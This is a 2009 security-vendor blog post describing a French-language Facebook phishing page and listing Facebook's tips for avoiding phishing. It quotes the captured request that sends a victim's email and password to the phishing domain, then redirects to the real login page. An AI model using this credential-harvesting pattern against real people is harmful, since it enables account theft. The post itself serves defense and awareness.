Facebook Phishing Site Targets French Users

Sean-Paul Correll — Thu, 05 Feb 2009 11:18:00 GMT

Today I discovered a new Facebook phishing site targeting French users. The login page looks identical to the official Facebook site, but the phishing site passes the victims credentials through a submission form before redirecting them to the official Facebook login site.

Source:

Connection:

(Passing the victims credentials over to the attacker)

_{GET hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&locale=fr_FR&email=victim@domain.com&pass=victimpass&pass_placeholder=Mot+de+passe&charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F}

(Redirecting to the official Facebook login page)

_{302 Moved Temporarily to https://login.facebook.com/login.php}

Even though this is a run of the mill phishing attack, we have noticed an uptrend of Phishing attacks especially in social networks. The attackers can do many things with harvested accounts, but one of the most common is to harvest as many accounts as possible before unleashing mass spamvertising or even full blown malware campaigns.

Tips to Avoid Phishing Attacks on Facebook [Facebook Blog]

Remember, Facebook will never ask for your password in an email, Facebook message, or any medium that isn't the login page. Though you will need to re-enter your password when you set a security question, change your contact email, or send a virtual gift.
Be extra aware of weird Wall posts. Don't click on any links—on a Wall or elsewhere—if you don't know where they go.
Set a security question for yourself on your Account page. If somehow something malicious shuts you out of your account, you will need the answer to that question in order for our User Operations team to let you back in. (If you've already set your security question, you won't see a prompt for it on your Account page.)
Be extra aware of what website you are using to log in to Facebook (and other websites). Phishing websites can be made to look like other websites (like the Facebook log in page), and might try to disguise their urls. Be smart: www.facebook.com.profile.a36h8su2m8.info/login starts out looking like a legitimate Facebook website, but that a36h8su2m8.info part means it's fraudulent. Set and use a browser bookmark to make sure you always log in from facebook.com
If you see a Wall post that looks like spam on a friend's Wall, tell the author to delete it and reset their password immediately.
Use a modern web browser to benefit from anti-phishing protection
- Internet Explorer 7
- Firefox
Check out opendns.com. This is another method for blocking specific domains that host phishing sites.

Make sure that you have an up-to-date Anti-Malware solution running at all times to prevent Phishing and other types of malicious attacks.

PandaLabs : Phishing

Facebook Phishing Site Targets French Users